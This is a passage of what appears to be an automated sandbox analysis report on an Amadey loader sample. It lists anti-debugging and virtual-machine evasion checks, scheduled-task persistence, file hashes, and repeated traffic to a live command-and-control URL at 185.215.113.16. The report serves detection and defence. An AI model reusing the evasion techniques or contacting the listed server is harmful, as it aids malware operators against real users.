                  Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8E8A7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2C7CE7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C5E8A7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: E97CE7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A20C01 rdtsc 0_2_04A20C01
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 389
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1119
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1607
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5520 Thread sleep count: 42 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5520 Thread sleep time: -84042s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1628 Thread sleep count: 36 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1628 Thread sleep time: -72036s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4720 Thread sleep count: 389 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4720 Thread sleep time: -11670000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4824 Thread sleep count: 1119 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4824 Thread sleep time: -2239119s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3836 Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6180 Thread sleep count: 1607 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6180 Thread sleep time: -3215607s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                  Source: axplong.exe, axplong.exe, 00000003.00000002.2189407934.0000000000DEA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: file.exe, 00000000.00000002.2154010878.0000000000BB2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                  Source: file.exe, 00000000.00000002.2148791457.000000000021A000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2184432930.0000000000DEA000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2189407934.0000000000DEA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A20C01 rdtsc 0_2_04A20C01
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: axplong.exe, axplong.exe, 00000003.00000002.2189407934.0000000000DEA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

                  Stealing of Sensitive Information

                  Source: Yara match File source: 3.2.axplong.exe.bf0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 2.2.axplong.exe.bf0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000007.00000003.2659233267.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000003.2143475152.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.2147793843.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000003.2148769900.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000003.2107291680.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000002.2189315361.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000002.2184346914.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 641 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  Source | Detection | Scanner | Label | Link
                  file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  file.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  http://185.215.113.16/Jo89Ku7d/index.php | 100% | Avira URL Cloud | phishing |
                  No contacted domains info
                  Name | Malicious | Antivirus Detection | Reputation
                  http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: phishing | unknown
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1519654
                  Start date and time:2024-09-26 19:50:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                  EGA Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 4320 because there are no executed function
                  • Execution Graph export aborted for target axplong.exe, PID 4592 because there are no executed function
                  • Execution Graph export aborted for target file.exe, PID 2316 because it is empty
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: file.exe
                  Time | Type | Description
                  13:52:02 | API Interceptor | 251007x Sleep call for process: axplong.exe modified
                  19:51:08 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey, Go Injector, XWorm | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                   | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                   | file.exe | malicious | Amadey | 185.215.113.16
                   | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                   | file.exe | malicious | Amadey | 185.215.113.16
                   | file.exe | malicious | Stealc | 185.215.113.37
                   | file.exe | malicious | Phorpiex | 185.215.113.66
                   | file.exe | malicious | Amadey | 185.215.113.16
                   | file.exe | malicious | Stealc | 185.215.113.37
                   | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                   | file.exe | malicious | Stealc | 185.215.113.37
                  No context
                  No context
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1936896
                  Entropy (8bit):7.949909040231611
                  Encrypted:false
                  SSDEEP:49152:XMz4/uhkyElzZRXsGajUuG5iH0TY/2g9r7:cz4o7ElzLBNGoYr7
                  MD5:2EC94ACBF5439B6B76B4A04D1D779397
                  SHA1:D43E4758F63E3C425C4EBED21D9393424F18206A
                  SHA-256:1232B1AEE31F39DB334E9233E7658F5DFDC588F3F698E619C3A0C9B3484C1629
                  SHA-512:2983A6EB702BEF684DF84B41C8DA43B111AF7318EC3515145FE36C542B07CCB9D7AAA59B107282060E9C420D90915E897F9EF2C3B95B793830118C49DBD90BD6
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................L...........@.................................W...k............................pL.............................lpL..................................................... . ............................@....rsrc...............................@....idata ............................@... .P+.........................@...hsrzezej......2..t..................@...vqlpxtuc......L......h..............@....taggant.0....L.."...l..............@...........................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):292
                  Entropy (8bit):3.411510951129594
                  Encrypted:false
                  SSDEEP:6:wtmLX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lbKt0:wcDQ1lOmeeDNfXVGt0
                  MD5:06BC05A9889F0CD189C7C33F58C68C23
                  SHA1:05B0005468CEC13157BB547B66D5770187F505F4
                  SHA-256:F18507994CC8F989CD26FD117ED5B167355D0BB5479581B31891E7CC01C89A27
                  SHA-512:F5BC9B5790C20F389677405C1B2A8BECBFBC4B6C02FD0835FD344736406A1B10B10646F980D1C540CE2370B32516B5B497465D6A854D87FBC7857176295B8B53
                  Malicious:false
                  Reputation:low
                  Preview:....X..F. HB.Jg.3.l~F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................4.@3P.........................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.949909040231611
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'936'896 bytes
                  MD5:2ec94acbf5439b6b76b4a04d1d779397
                  SHA1:d43e4758f63e3c425c4ebed21d9393424f18206a
                  SHA256:1232b1aee31f39db334e9233e7658f5dfdc588f3f698e619c3a0c9b3484c1629
                  SHA512:2983a6eb702bef684df84b41c8da43b111af7318ec3515145fe36c542b07ccb9d7aaa59b107282060e9c420d90915e897f9ef2c3b95b793830118c49dbd90bd6
                  SSDEEP:49152:XMz4/uhkyElzZRXsGajUuG5iH0TY/2g9r7:cz4o7ElzLBNGoYr7
                  TLSH:5995332B4613DBF8C89D48FC914A43A17B39B0F6497A9BB70023866D50CBEE950DDDB4
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x8c9000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                  Instruction
                  jmp 00007F05ECCDBA5Ah
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4c70bc | 0x10 | hsrzezej
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x4c706c | 0x18 | hsrzezej
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                   | 0x1000 | 0x68000 | 0x2de00 | b4650c512422daea9d14e9901f35a4ff | False | 0.9970516859673024 | data | 7.980121831672435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x69000 | 0x1e0 | 0x200 | e677fd0fb795480800d6e2898af5fc0d | False | 0.576171875 | data | 4.500339729324091 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                   | 0x6b000 | 0x2b5000 | 0x200 | 31d776fb8608bfb2d2f991b3834b8fc4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  hsrzezej | 0x320000 | 0x1a8000 | 0x1a7400 | a821afb71a2607cef17a7cd111fdc769 | False | 0.9945219054562906 | data | 7.9531207012657585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  vqlpxtuc | 0x4c8000 | 0x1000 | 0x400 | dee3ca8b85f32d0be740925325448ebc | False | 0.7880859375 | data | 6.1047755318017245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant | 0x4c9000 | 0x3000 | 0x2200 | b9d9729759c13b9cad16d820175af6ab | False | 0.06801470588235294 | DOS executable (COM) | 0.7787720701321621 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_MANIFEST | 0x4c70cc | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                  DLL | Import
                  kernel32.dll | lstrcpy
                  Language of compilation system | Country where language is spoken | Map
                  English | United States |
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-09-26T19:52:17.634115+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.5 | 49724 | 185.215.113.16 | 80 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 26, 2024 19:52:28.384124041 CEST4973480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.384829998 CEST4973480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.389643908 CEST8049734185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:28.615612030 CEST8049734185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:28.615693092 CEST4973480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.724827051 CEST4973480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.725142002 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.729959011 CEST8049735185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:28.729990959 CEST8049734185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:28.730061054 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.730083942 CEST4973480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.730205059 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:28.735028982 CEST8049735185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:29.421099901 CEST8049735185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:29.421246052 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.421895981 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.426750898 CEST8049735185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:29.645183086 CEST8049735185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:29.645329952 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.757942915 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.758234978 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.763099909 CEST8049736185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:29.763243914 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.763290882 CEST8049735185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:29.763346910 CEST4973580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.763433933 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:29.768690109 CEST8049736185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:30.470469952 CEST8049736185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:30.470556974 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.471194983 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.476090908 CEST8049736185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:30.743355989 CEST8049736185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:30.743511915 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.849936962 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.850225925 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.855010986 CEST8049736185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:30.855078936 CEST8049737185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:30.855078936 CEST4973680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.855151892 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.855334997 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:30.860179901 CEST8049737185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:31.571554899 CEST8049737185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:31.571650028 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:31.572357893 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:31.578521013 CEST8049737185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:31.796993971 CEST8049737185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:31.797187090 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:31.912409067 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:31.912734032 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:32.117866993 CEST8049738185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:32.117979050 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:32.118082047 CEST8049737185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:32.118125916 CEST4973780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:32.118624926 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:32.124056101 CEST8049738185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:32.835402966 CEST8049738185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:32.835506916 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:32.836201906 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:32.842230082 CEST8049738185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:33.063921928 CEST8049738185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:33.064045906 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.178064108 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.178329945 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.183206081 CEST8049738185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:33.183226109 CEST8049739185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:33.183278084 CEST4973880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.183311939 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.183466911 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.188249111 CEST8049739185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:33.871776104 CEST8049739185.215.113.16192.168.2.5
